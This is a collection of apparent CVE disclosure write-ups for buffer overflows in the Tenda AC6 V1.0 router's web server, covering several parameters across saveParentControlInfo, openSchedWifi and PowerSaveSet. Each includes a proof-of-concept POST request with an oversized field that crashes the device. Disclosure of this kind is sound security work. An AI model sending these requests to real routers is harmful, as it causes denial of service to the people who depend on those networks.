https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_deviceId/saveParentControlInfo_deviceid.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the saveParentControlInfo function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/saveParentControlInfo` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/saveParentControlInfo` page,The details are shown below: 20 | 21 | ![image-20221118151051075](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/saveParentControlInfo HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1157 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | deviceId=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_time/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_time/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_time/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_time/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_time/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_time/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_time/saveParentControlInfo_time.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the saveParentControlInfo function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/saveParentControlInfo` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/saveParentControlInfo` page,The details are shown below: 20 | 21 | ![image-20221118151051075](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/saveParentControlInfo HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1157 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | time=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_urls/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_urls/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_urls/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_urls/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_urls/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/saveParentControlInfo_urls/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_urls/saveParentControlInfo_urls.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the urls parameter in the saveParentControlInfo function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/saveParentControlInfo` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/saveParentControlInfo` page,The details are shown below: 20 | 21 | ![image-20221118151728054](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/saveParentControlInfo HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1157 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | urls=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedEndTime/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSchedWifi_schedEndTime/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedEndTime/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSchedWifi_schedEndTime/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedEndTime/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSchedWifi_schedEndTime/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedEndTime/setSchedWifi_schedEndTime.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the schedEndTime parameter in the setSchedWifi function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/openSchedWifi` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/openSchedWifi` page,The details are shown below: 20 | 21 | ![image-20221119104411836](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/openSchedWifi HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2082 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | schedWifiEnable=0&schedEndTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedStartTime/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSchedWifi_schedStartTime/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedStartTime/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSchedWifi_schedStartTime/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedStartTime/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSchedWifi_schedStartTime/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/setSchedWifi_schedStartTime/setSchedWifi_schedStartTime.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the schedStartTime parameter in the setSchedWifi function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/openSchedWifi` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/openSchedWifi` page,The details are shown below: 20 | 21 | ![image-20221119104411836](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/openSchedWifi HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2082 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | schedWifiEnable=0&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSmartPowerManagement/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSmartPowerManagement/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSmartPowerManagement/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/setSmartPowerManagement.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the setSmartPowerManagement function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/PowerSaveSet` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/PowerSaveSet` page,The details are shown below: 20 | 21 | ![image-20221119100455243](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/PowerSaveSet HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1380 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | 